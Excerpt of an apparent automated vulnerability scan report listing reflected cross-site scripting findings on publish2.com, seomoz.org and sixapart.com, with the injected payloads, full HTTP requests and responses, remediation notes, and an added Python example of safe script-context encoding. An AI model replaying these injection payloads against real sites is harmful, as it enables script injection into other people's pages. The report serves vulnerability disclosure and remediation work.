Cookie: kohanasession=cu27eumn4jg9orqicb0mpi8ra5; kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiJjdTI3ZXVtbjRqZzlvcnFpY2IwbXBpOHJhNSI7dG90YWxfaGl0c3xpOjY7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6MTE5OiJNb3ppbGxhLzUuMCAoV2luZG93czsgVTsgV2luZG93cyBOVCA2LjE7IGVuLVVTKSBBcHBsZVdlYktpdC81MzQuMTAgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvOC4wLjU1Mi4yMjQgU2FmYXJpLzUzNC4xMCI7aXBfYWRkcmVzc3xzOjE0OiIxNzQuMTIxLjIyMi4xOCI7bGFzdF9hY3Rpdml0eXxpOjEyOTI1MDUwMjA7;

Response

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 13:16:20 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: kohanasession_data=deleted; expires=Wed, 16-Dec-2009 13:16:19 GMT; path=/
Set-Cookie: kohanasession=deleted; expires=Wed, 16-Dec-2009 13:16:19 GMT; path=/
Set-Cookie: kohanasession=hm3833egcpi9dk4u46kugqmcc5; path=/
Set-Cookie: kohanasession=hm3833egcpi9dk4u46kugqmcc5; path=/
P3P: CP="CAO CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiJobTM4MzNlZ2NwaTlkazR1NDZrdWdxbWNjNSI7dG90YWxfaGl0c3xpOjE7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6NTA6Ik1vemlsbGEvNC4wIChjb21wYXRpYmxlOyBNU0lFIDcuMDsgV2luZG93cyBOVCA2LjApIjtpcF9hZGRyZXNzfHM6MTQ6IjE3NC4xMjEuMjIyLjE4IjtsYXN0X2FjdGl2aXR5fGk6MTI5MjUwNTM4MDs%3D; path=/
Content-Length: 2548
Connection: close
Content-Type: application/x-javascript

(function(){

getParentScriptTag = function() {
// Attempt to get parent script tag via id
scr = document.getElementById("publish2_widget_token");
// Legacy widgets don't have script
...[SNIP]...
<len; i++) {
if (scripts[i].src == "http://www.publish2.com/syndicate/widget/?%0088f8f"-alert(1)-"9893ef1728b=1") {
scr = scripts[i];
break;
}
}
}
};

injectContainer = function() {
// Unique container for widget HTML, hidden until filled so we aren't adding el
...[SNIP]...

2.398. http://www.publish2.com/syndicate/widget/ [number_of_items parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.publish2.com
Path:   /syndicate/widget/

Issue detail

The value of the number_of_items request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c0532"-alert(1)-"46d4c29db7a was submitted in the number_of_items parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /syndicate/widget/?feed=journalists/jeff-jarvis/links/wwgd/json&feed_type=json&widget_src=http%3A%2F%2Fwww.publish2.com%2Fsyndicate%2Fwidget%2F%3Ffeed%3Djournalists%2Fjeff-jarvis%2Flinks%2Fwwgd%2Fjson&title=WWGD%3F+links+via+Publis2&number_of_items=5c0532"-alert(1)-"46d4c29db7a&headline_font_family=&headline_font_size=&headline_font_color=&headline_font_decoration=&headline_font_weight=&comment_font_family=&comment_font_size= HTTP/1.1
Host: www.publish2.com
Proxy-Connection: keep-alive
Referer: http://www.buzzmachine.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 13:16:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: kohanasession=q7ui948jpve3p9ejed9jm7t136; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: kohanasession=q7ui948jpve3p9ejed9jm7t136; path=/
P3P: CP="CAO CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiJxN3VpOTQ4anB2ZTNwOWVqZWQ5am03dDEzNiI7dG90YWxfaGl0c3xpOjE7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6MTE5OiJNb3ppbGxhLzUuMCAoV2luZG93czsgVTsgV2luZG93cyBOVCA2LjE7IGVuLVVTKSBBcHBsZVdlYktpdC81MzQuMTAgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvOC4wLjU1Mi4yMjQgU2FmYXJpLzUzNC4xMCI7aXBfYWRkcmVzc3xzOjE0OiIxNzQuMTIxLjIyMi4xOCI7bGFzdF9hY3Rpdml0eXxpOjEyOTI1MDUzOTA7; path=/
Content-Length: 3302
Content-Type: application/x-javascript

(function(){

getParentScriptTag = function() {
// Attempt to get parent script tag via id
scr = document.getElementById("publish2_widget_token");
// Legacy widgets don't have script
...[SNIP]...
inks/wwgd/json&feed_type=json&widget_src=http%3A%2F%2Fwww.publish2.com%2Fsyndicate%2Fwidget%2F%3Ffeed%3Djournalists%2Fjeff-jarvis%2Flinks%2Fwwgd%2Fjson&title=WWGD%3F+links+via+Publis2&number_of_items=5c0532"-alert(1)-"46d4c29db7a&headline_font_family=&headline_font_size=&headline_font_color=&headline_font_decoration=&headline_font_weight=&comment_font_family=&comment_font_size=") {
scr = scripts[i];
break;

...[SNIP]...

2.399. http://www.publish2.com/syndicate/widget/ [title parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.publish2.com
Path:   /syndicate/widget/

Issue detail

The value of the title request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d5922"-alert(1)-"bfb2c9efafa was submitted in the title parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /syndicate/widget/?feed=journalists/jeff-jarvis/links/wwgd/json&feed_type=json&widget_src=http%3A%2F%2Fwww.publish2.com%2Fsyndicate%2Fwidget%2F%3Ffeed%3Djournalists%2Fjeff-jarvis%2Flinks%2Fwwgd%2Fjson&title=WWGD%3F+links+via+Publis2d5922"-alert(1)-"bfb2c9efafa&number_of_items=5&headline_font_family=&headline_font_size=&headline_font_color=&headline_font_decoration=&headline_font_weight=&comment_font_family=&comment_font_size= HTTP/1.1
Host: www.publish2.com
Proxy-Connection: keep-alive
Referer: http://www.buzzmachine.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 13:16:25 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: kohanasession=ciellvhjsjjfeliq3obqotj6c5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: kohanasession=ciellvhjsjjfeliq3obqotj6c5; path=/
P3P: CP="CAO CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiJjaWVsbHZoanNqamZlbGlxM29icW90ajZjNSI7dG90YWxfaGl0c3xpOjE7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6MTE5OiJNb3ppbGxhLzUuMCAoV2luZG93czsgVTsgV2luZG93cyBOVCA2LjE7IGVuLVVTKSBBcHBsZVdlYktpdC81MzQuMTAgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvOC4wLjU1Mi4yMjQgU2FmYXJpLzUzNC4xMCI7aXBfYWRkcmVzc3xzOjE0OiIxNzQuMTIxLjIyMi4xOCI7bGFzdF9hY3Rpdml0eXxpOjEyOTI1MDUzODU7; path=/
Content-Length: 3302
Content-Type: application/x-javascript

(function(){

getParentScriptTag = function() {
// Attempt to get parent script tag via id
scr = document.getElementById("publish2_widget_token");
// Legacy widgets don't have script
...[SNIP]...
ists/jeff-jarvis/links/wwgd/json&feed_type=json&widget_src=http%3A%2F%2Fwww.publish2.com%2Fsyndicate%2Fwidget%2F%3Ffeed%3Djournalists%2Fjeff-jarvis%2Flinks%2Fwwgd%2Fjson&title=WWGD%3F+links+via+Publis2d5922"-alert(1)-"bfb2c9efafa&number_of_items=5&headline_font_family=&headline_font_size=&headline_font_color=&headline_font_decoration=&headline_font_weight=&comment_font_family=&comment_font_size=") {
scr = scripts[i];
...[SNIP]...

2.400. http://www.publish2.com/syndicate/widget/ [widget_src parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.publish2.com
Path:   /syndicate/widget/

Issue detail

The value of the widget_src request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7a278"-alert(1)-"bcc24607399 was submitted in the widget_src parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /syndicate/widget/?feed=journalists/jeff-jarvis/links/wwgd/json&feed_type=json&widget_src=http%3A%2F%2Fwww.publish2.com%2Fsyndicate%2Fwidget%2F%3Ffeed%3Djournalists%2Fjeff-jarvis%2Flinks%2Fwwgd%2Fjson7a278"-alert(1)-"bcc24607399&title=WWGD%3F+links+via+Publis2&number_of_items=5&headline_font_family=&headline_font_size=&headline_font_color=&headline_font_decoration=&headline_font_weight=&comment_font_family=&comment_font_size= HTTP/1.1
Host: www.publish2.com
Proxy-Connection: keep-alive
Referer: http://www.buzzmachine.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 13:16:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: kohanasession=9nhcug52lv93jsjrii6t58oct0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: kohanasession=9nhcug52lv93jsjrii6t58oct0; path=/
P3P: CP="CAO CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiI5bmhjdWc1Mmx2OTNqc2pyaWk2dDU4b2N0MCI7dG90YWxfaGl0c3xpOjE7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6MTE5OiJNb3ppbGxhLzUuMCAoV2luZG93czsgVTsgV2luZG93cyBOVCA2LjE7IGVuLVVTKSBBcHBsZVdlYktpdC81MzQuMTAgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvOC4wLjU1Mi4yMjQgU2FmYXJpLzUzNC4xMCI7aXBfYWRkcmVzc3xzOjE0OiIxNzQuMTIxLjIyMi4xOCI7bGFzdF9hY3Rpdml0eXxpOjEyOTI1MDUzODE7; path=/
Content-Length: 3302
Content-Type: application/x-javascript

(function(){

getParentScriptTag = function() {
// Attempt to get parent script tag via id
scr = document.getElementById("publish2_widget_token");
// Legacy widgets don't have script
...[SNIP]...
m/syndicate/widget/?feed=journalists/jeff-jarvis/links/wwgd/json&feed_type=json&widget_src=http%3A%2F%2Fwww.publish2.com%2Fsyndicate%2Fwidget%2F%3Ffeed%3Djournalists%2Fjeff-jarvis%2Flinks%2Fwwgd%2Fjson7a278"-alert(1)-"bcc24607399&title=WWGD%3F+links+via+Publis2&number_of_items=5&headline_font_family=&headline_font_size=&headline_font_color=&headline_font_decoration=&headline_font_weight=&comment_font_family=&comment_font_size=
...[SNIP]...

2.401. http://www.publish2.com/widget/display/publish2_widget_html_61657798d9d56955d570ac504ad152e9/ [feed parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.publish2.com
Path:   /widget/display/publish2_widget_html_61657798d9d56955d570ac504ad152e9/

Issue detail

The value of the feed request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3e292'%3balert(1)//c93c93cdbca was submitted in the feed parameter. This input was echoed as 3e292';alert(1)//c93c93cdbca in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /widget/display/publish2_widget_html_61657798d9d56955d570ac504ad152e9/?feed=3e292'%3balert(1)//c93c93cdbca&feed_type=json&widget_src=http%3A%2F%2Fwww.publish2.com%2Fsyndicate%2Fwidget%2F%3Ffeed%3Djournalists%2Fjeff-jarvis%2Flinks%2Fwwgd%2Fjson&title=WWGD%3F+links+via+Publis2&number_of_items=5&headline_font_family=&headline_font_size=&headline_font_color=&headline_font_decoration=&headline_font_weight=&comment_font_family=&comment_font_size= HTTP/1.1
Host: www.publish2.com
Proxy-Connection: keep-alive
Referer: http://www.buzzmachine.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kohanasession=bjt7b5i28b37sqvf162ehncch6; kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiJianQ3YjVpMjhiMzdzcXZmMTYyZWhuY2NoNiI7dG90YWxfaGl0c3xpOjE7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6MTE5OiJNb3ppbGxhLzUuMCAoV2luZG93czsgVTsgV2luZG93cyBOVCA2LjE7IGVuLVVTKSBBcHBsZVdlYktpdC81MzQuMTAgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvOC4wLjU1Mi4yMjQgU2FmYXJpLzUzNC4xMCI7aXBfYWRkcmVzc3xzOjE0OiIxNzQuMTIxLjIyMi4xOCI7bGFzdF9hY3Rpdml0eXxpOjEyOTI1MDQ5NTA7

Response

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 13:16:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: kohanasession=bjt7b5i28b37sqvf162ehncch6; path=/
P3P: CP="CAO CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiJianQ3YjVpMjhiMzdzcXZmMTYyZWhuY2NoNiI7dG90YWxfaGl0c3xpOjI7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6MTE5OiJNb3ppbGxhLzUuMCAoV2luZG93czsgVTsgV2luZG93cyBOVCA2LjE7IGVuLVVTKSBBcHBsZVdlYktpdC81MzQuMTAgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvOC4wLjU1Mi4yMjQgU2FmYXJpLzUzNC4xMCI7aXBfYWRkcmVzc3xzOjE0OiIxNzQuMTIxLjIyMi4xOCI7bGFzdF9hY3Rpdml0eXxpOjEyOTI1MDUzNzY7; path=/
Content-Length: 6910
Content-Type: application/x-javascript

(function($){

var widget = function() {
var l = links(),
h = html();

return {
init: function() {
// JSON cache does not exist
if (l.json.title == un
...[SNIP]...
};
};

var links = function() {
return {
json: {},

requestJSON: function() {
$.ajax({
url: 'http://www.publish2.com/3e292';alert(1)//c93c93cdbca?number_of_items=5',
dataType: 'jsonp',
success: function(data, textStatus) {
w.display(data);
}
});
}
};
};

var html = function(
...[SNIP]...

2.402. http://www.seomoz.org/blog [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seomoz.org
Path:   /blog

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3fe06"><script>alert(1)</script>5c2614ea387 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3fe06\"><script>alert(1)</script>5c2614ea387 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog?3fe06"><script>alert(1)</script>5c2614ea387=1 HTTP/1.1
Host: www.seomoz.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 13:17:07 GMT
Server: Apache/2.2.9 (Ubuntu) DAV/2 PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-2ubuntu4.6
Cache-Control: no-cache, must-revalidate
Expires: Sat, 26 Jul 1997 05:00:00 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: SSSO=Q29uZmlnfGE6Mzp7czo0OiJyYW5kIjtpOjE1NjkxOTY4NzE7czo0OiJ0aW1lIjtpOjEyOTI1MTYyMjc7czo5OiJ1c2VyQWdlbnQiO3M6MzI6IjcwY2M4NDUwNzc1NmFjZjE4MTExMWM2MDkwYjQ3OGFmIjt9%7C4F%2F0Eig8qBjhRkHqNT0tdPpHYao%3D; expires=Thu, 16-Dec-2010 16:17:08 GMT; path=/; domain=.seomoz.org
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 54831

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<link rel="shortcut icon" href="/favicon.ico" />
...[SNIP]...
<a href="/blog?3fe06\"><script>alert(1)</script>5c2614ea387=1&page=2" rel="nofollow" id="link2146061066" onclick=" return false;">
...[SNIP]...

2.403. http://www.seomoz.org/blog [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seomoz.org
Path:   /blog

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f300d</script><script>alert(1)</script>9d81e504b1b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blog?f300d</script><script>alert(1)</script>9d81e504b1b=1 HTTP/1.1
Host: www.seomoz.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 13:17:20 GMT
Server: Apache/2.2.9 (Ubuntu) DAV/2 PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-2ubuntu4.6
Cache-Control: no-cache, must-revalidate
Expires: Sat, 26 Jul 1997 05:00:00 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: SSSO=Q29uZmlnfGE6Mzp7czo0OiJyYW5kIjtpOjEzMDc4MzA4MTtzOjQ6InRpbWUiO2k6MTI5MjUxNjI0MDtzOjk6InVzZXJBZ2VudCI7czozMjoiNzBjYzg0NTA3NzU2YWNmMTgxMTExYzYwOTBiNDc4YWYiO30%3D%7C8%2B8%2B85yqczh9%2BbU%2FyVNZiCmdsqI%3D; expires=Thu, 16-Dec-2010 16:17:20 GMT; path=/; domain=.seomoz.org
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 54973

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<link rel="shortcut icon" href="/favicon.ico" />
...[SNIP]...
<script type="text/javascript">Event.observe('link302670681', 'click', function(event){ new Ajax.Updater('content','/blog?f300d</script><script>alert(1)</script>9d81e504b1b=1&page=2', {asynchronous:true, evalScripts:true, requestHeaders:['X-Update', 'content']}) }, false);</script>
...[SNIP]...
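
The following is an added example, not code from this report or from seomoz.org. It models the sink of finding 2.403 in Python: the Ajax.Updater line is the one recorded in the response above, while the two render functions, the addslashes-style escaping and the js_string_literal helper are assumptions made for illustration. It shows that quote escaping leaves the recorded payload able to end the script element, and that encoding the value as a JavaScript literal with angle brackets escaped does not.

```python
"""Script-context encoding, an added example that is not code from the
report or from seomoz.org. It models the sink in finding 2.403 in Python:
an attacker-controlled parameter name is placed inside a single-quoted
JavaScript string in an inline <script> element, and the recorded payload
ends the element with </script> without ever touching the quotes."""
import json
import re

# Payload recorded in finding 2.403 (sent as a request parameter name).
PAYLOAD_2_403 = "f300d</script><script>alert(1)</script>9d81e504b1b"

# An HTML parser leaves the script data state at the first "</script",
# regardless of any JavaScript string quoting in progress.
SCRIPT_CLOSE = re.compile(r"</script", re.IGNORECASE)


def render_naive(param_name: str) -> str:
    """Vulnerable (assumed fix attempt): escapes only backslashes and the
    enclosing quote, the addslashes-style fix that looks adequate for a
    quoted JS string but does nothing about angle brackets."""
    escaped = param_name.replace("\\", "\\\\").replace("'", "\\'")
    url = "/blog?%s=1&page=2" % escaped
    template = ('<script type="text/javascript">'
                "new Ajax.Updater('content','%s', {asynchronous:true});"
                "</script>")
    return template % url


def js_string_literal(value: str) -> str:
    """Encode *value* as a double-quoted JS string literal that is also safe
    inside an HTML <script> element. json.dumps escapes quotes, backslashes,
    control characters and (with ensure_ascii, the default) all non-ASCII
    including U+2028/U+2029, but it leaves '<', '>' and '&' alone; those are
    turned into \\uXXXX escapes so that neither "</script" nor "<!--" can
    appear in the output. JavaScript decodes the escapes back to the
    original characters at runtime."""
    literal = json.dumps(value)
    for ch in "<>&":
        literal = literal.replace(ch, "\\u%04x" % ord(ch))
    return literal


def render_hardened(param_name: str) -> str:
    """Same sink; the value is emitted through js_string_literal so it can
    close neither the string nor the element."""
    url = "/blog?%s=1&page=2" % param_name
    template = ('<script type="text/javascript">'
                "new Ajax.Updater('content',%s, {asynchronous:true});"
                "</script>")
    return template % js_string_literal(url)


def script_end_count(markup: str) -> int:
    """How many times an HTML parser would leave the script block. One is
    the legitimate close; anything more means the payload broke out."""
    return len(SCRIPT_CLOSE.findall(markup))


if __name__ == "__main__":
    for name, render in (("naive", render_naive), ("hardened", render_hardened)):
        out = render(PAYLOAD_2_403)
        print("%-8s script ends=%d  %s" % (name, script_end_count(out), out))
```

The naive render contains three places where the parser ends a script block (the two from the payload plus the real one), which is exactly the structure visible in the response of 2.403; the hardened render contains one, and the URL still round-trips to the same string once the browser evaluates the literal.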

2.404. http://www.sixapart.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sixapart.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2dbdf"><script>alert(1)</script>f9b4b2b9b3b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The sink is the host's 404 error page, which writes the full request URI (path and query string) into a hidden request_uri input without attribute encoding, so the issue is reachable through any non-existent path on www.sixapart.com rather than being specific to /favicon.ico; entries 2.405 to 2.411 below hit the same field.

Request

GET /favicon.ico2dbdf"><script>alert(1)</script>f9b4b2b9b3b HTTP/1.1
Host: www.sixapart.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 404 Not Found
Date: Thu, 16 Dec 2010 14:04:45 GMT
Server: Apache
Content-Location: error.html.en
Vary: negotiate,accept-language,Accept-Encoding
TCN: choice
X-Powered-By: PHP/5.0.4
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/html; charset=UTF-8
Content-Language: en
Connection: keep-alive
Content-Length: 6092

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<META name="v
...[SNIP]...
<input name="request_uri" type="hidden" value="/favicon.ico2dbdf"><script>alert(1)</script>f9b4b2b9b3b" />
...[SNIP]...

2.405. http://www.sixapart.com/ns/at [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sixapart.com
Path:   /ns/at

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21bc1"><script>alert(1)</script>ddc017331 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ns21bc1"><script>alert(1)</script>ddc017331/at HTTP/1.1
Host: www.sixapart.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Thu, 16 Dec 2010 13:17:20 GMT
Server: Apache
Content-Location: error.html.en
TCN: choice
X-Powered-By: PHP/5.0.4
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 6084
Content-Type: text/html; charset=UTF-8
Content-Language: en

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<META name="v
...[SNIP]...
<input name="request_uri" type="hidden" value="/ns21bc1"><script>alert(1)</script>ddc017331/at" />
...[SNIP]...

2.406. http://www.sixapart.com/ns/at [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sixapart.com
Path:   /ns/at

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2fe9"><script>alert(1)</script>ea15281548 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ns/atd2fe9"><script>alert(1)</script>ea15281548 HTTP/1.1
Host: www.sixapart.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Thu, 16 Dec 2010 13:17:21 GMT
Server: Apache
Content-Location: error.html.en
TCN: choice
X-Powered-By: PHP/5.0.4
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 6085
Content-Type: text/html; charset=UTF-8
Content-Language: en

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<META name="v
...[SNIP]...
<input name="request_uri" type="hidden" value="/ns/atd2fe9"><script>alert(1)</script>ea15281548" />
...[SNIP]...

2.407. http://www.sixapart.com/ns/at [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sixapart.com
Path:   /ns/at

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49c1c"><script>alert(1)</script>0ccf61bcd1e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ns/at?49c1c"><script>alert(1)</script>0ccf61bcd1e=1 HTTP/1.1
Host: www.sixapart.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Thu, 16 Dec 2010 13:17:20 GMT
Server: Apache
Content-Location: error.html.en
